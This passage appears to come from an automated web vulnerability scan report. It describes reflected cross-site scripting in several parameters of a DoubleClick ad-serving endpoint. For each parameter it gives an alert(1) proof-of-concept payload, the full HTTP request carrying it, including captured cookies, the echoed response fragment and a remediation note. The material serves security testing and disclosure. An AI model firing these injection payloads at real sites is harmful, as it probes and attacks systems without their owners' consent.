function DCFlash(id,pVM){ ...[SNIP]... 7684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=010872"-alert(1)-"acdc1d3a658&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/un ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14101'-alert(1)-'9012cbf68f8 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=014101'-alert(1)-'9012cbf68f8&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 7684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=014101'-alert(1)-'9012cbf68f8&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/un ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cabe4"-alert(1)-"97e05b8809f was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=cabe4"-alert(1)-"97e05b8809f&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... dlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=cabe4"-alert(1)-"97e05b8809f&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_2 ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68bce'-alert(1)-'40306924c51 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=68bce'-alert(1)-'40306924c51&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... dlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=68bce'-alert(1)-'40306924c51&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_2 ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5f09"-alert(1)-"b25a57f7a25 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=e5f09"-alert(1)-"b25a57f7a25&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... m.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=e5f09"-alert(1)-"b25a57f7a25&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_612 ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d369d'-alert(1)-'ea69ad5ad8d was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d369d'-alert(1)-'ea69ad5ad8d&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... m.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d369d'-alert(1)-'ea69ad5ad8d&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_612 ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bffa0"-alert(1)-"5c6282b8c0b was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=bffa0"-alert(1)-"5c6282b8c0b&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... %3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=bffa0"-alert(1)-"5c6282b8c0b&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-state ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf79'-alert(1)-'304d485a9b0 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=adf79'-alert(1)-'304d485a9b0&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... %3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=adf79'-alert(1)-'304d485a9b0&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-state ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afa8c'-alert(1)-'874e7acf5a1 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=afa8c'-alert(1)-'874e7acf5a1&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=afa8c'-alert(1)-'874e7acf5a1&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f067"-alert(1)-"391365dc15b was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=6f067"-alert(1)-"391365dc15b&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=6f067"-alert(1)-"391365dc15b&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79a7a'-alert(1)-'05dc45748a4 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=79a7a'-alert(1)-'05dc45748a4 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=79a7a'-alert(1)-'05dc45748a4http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608435\"> ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43394"-alert(1)-"80f259101aa was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=43394"-alert(1)-"80f259101aa HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=43394"-alert(1)-"80f259101aahttp://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334"); var wmode = "opaque"; var bg = "same as SWF"; var dcallows ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe980'-alert(1)-'4cf6a47e2e4 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cnfe980'-alert(1)-'4cf6a47e2e4&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... ck.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cnfe980'-alert(1)-'4cf6a47e2e4&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=20 ...[SNIP]...
